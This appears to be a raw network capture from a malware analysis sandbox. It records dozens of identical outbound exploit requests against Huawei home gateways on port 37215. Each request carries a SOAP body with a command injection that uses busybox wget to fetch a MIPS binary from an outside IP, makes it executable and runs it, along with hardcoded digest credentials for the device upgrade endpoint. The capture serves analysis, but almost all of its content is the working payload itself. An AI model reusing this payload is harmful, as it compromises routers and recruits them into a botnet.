                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            56192.168.2.143774841.229.62.3137215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662098885 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            57192.168.2.143289441.153.119.11137215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662098885 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            58192.168.2.144791041.181.77.3937215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662111998 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            59192.168.2.1449752197.165.171.18937215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662156105 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            60192.168.2.1435624156.159.166.6137215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662164927 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            61192.168.2.143315041.211.139.16737215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662188053 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            62192.168.2.145081641.162.173.24137215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662200928 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            63192.168.2.145192041.65.197.237215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662245035 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            64192.168.2.1438556156.131.196.11937215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662270069 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            65192.168.2.1433748156.124.39.24337215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662326097 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 39 37 2e 34 35 2e 32 30 38 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 [TRUNCATED]
                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 104.197.45.208 -l /tmp/kh -r /mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            66192.168.2.145764841.31.120.9537215
                                            TimestampBytes transferredDirectionData
                                            Jun 14, 2024 10:43:34.662326097 CEST818OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                            Content-Length: 430
                                            Connection: keep-alive
                                            Accept: */*
                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
